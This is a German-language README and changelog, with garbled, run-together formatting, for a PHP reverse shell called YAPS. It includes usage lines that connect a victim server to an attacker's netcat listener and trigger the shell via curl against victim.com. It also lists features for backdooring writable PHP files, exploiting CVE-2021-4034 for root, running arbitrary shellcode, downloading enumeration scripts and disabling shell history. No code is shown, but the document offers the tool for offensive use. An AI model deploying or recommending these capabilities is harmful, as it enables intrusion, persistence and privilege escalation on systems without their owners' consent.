
Yet Another PHP Shell - Das umfassendste PHP Reverse Shell

Ja, wie der Name verrät, ist dies eine weitere PHP-Reverse-Shell, eine unter Hunderten, die es gibt, aber mit einigen Vorteilen. Es ist eine einzelne PHP-Datei, die alle ihre Funktionen enthält, und Sie können sie über einen einfachen TCP-Listener steuern (z.B. nc -lp 1337).
In der aktuellen Version (1.5) unterstützen die Hauptfunktionen nur Linux-Systeme, aber ich plane, sie auch unter Windows zum Laufen zu bringen.
Es ist derzeit in seiner ersten Version und ich habe es noch nicht viel getestet, und es gibt noch viele Dinge, die ich für die nächsten Versionen tun und verbessern möchte (es ist noch nicht fertig!), also lass es mich bitte wissen, wenn du Fehler gefunden hast oder einen Vorschlag für eine Funktion oder Verbesserung hast. =)
!interactive eine interaktive Shell starten können)
rlwrap nc -lp <ip> <port>)curl -x POST -d "x=ip:port" victim.com/yaps.php);yaps.php?s oder yaps.php?silent setzen, um das Banner zu unterdrückenphp yaps.php ip port ausführen!help - Hilfe-Menü anzeigen!all-colors - Alle Farben umschalten (kompatibel mit farblosen TTYs)!color - PS1-Farbe umschalten (nur lokal, keine Umgebungsvariable wird geändert)!duplicate - Eine weitere YAPS-Verbindung starten!enum - LinPEAS und LinEnum nach /tmp herunterladen und bereit zum Verwenden machen!info - Informationen über das Ziel auflisten (die oben erwähnte Aufzählung)!infect - Beschreibbare PHP-Dateien mit Hintertüren infizieren!interactive - Interaktive Reverse-Shells auf anderen Ports starten (funktioniert mit sudo, su, mysql, etc.)!passwd - Passwortoption (aktivieren, deaktivieren, setzen, ändern)!php - PHP auf dem entfernten Host schreiben und ausführen




v1.5 - 12/02/2022
!shellcode hinzugefügt, um einen beliebigen Shellcode zu empfangen und auszuführenduplicate()-Funktion verbessert (Sie können jetzt einen Bereich von Ports angeben)stabilize in interactive geändertTERM=xterm allen Befehlen vorangestelltv1.4 - 04/02/2022
!pwnkit hinzugefügt, um CVE-2021-4034 auszunutzen und eine Root-Reverse-Shell zu startenverify_update()-Funktion verbessertv1.3.1 - 01/08/2021
v1.3 - 28/07/2021
!infect hinzugefügt, um PHP-Dateien mit Hintertüren zu infizieren!stabilize-Payload geändert (Fehler behoben)v1.2.2 - 18/07/2021
v1.2.1 - 17/07/2021
v1.2 - 17/07/2021
!duplicate hinzugefügt, um eine weitere Shell zu starten--update|-u)--help|-h)php yaps.php ip port)v1.1 - 12/07/2021
!all-colors hinzugefügt, um Terminalfarben umzuschalten und mit farblosen TTYs zu arbeitenexit-Befehl hinzugefügt, um den Socket zu schließen (Shell verlassen)!stabilize geändert, um HISTSIZE und HISTFILE zu deaktivieren!info geändertv1.0.1 - 08/07/2021
[x,y,z] in array(x,y,z) geändert, um die Kompatibilität mit älteren PHP-Versionen zu verbessernEinige Ideen wurden von diesen Tools inspiriert:
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
https://github.com/rebootuser/LinEnum
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
https://github.com/pentestmonkey/php-reverse-shell
!pwnkit - Versucht, CVE-2021-4034 auszunutzen und eine Root-Reverse-Shell zu starten!shellcode - Shellcode senden und auf dem entfernten Host ausführen!suggester - Linux Exploit Suggester nach /tmp herunterladen und bereit zum Verwenden machen


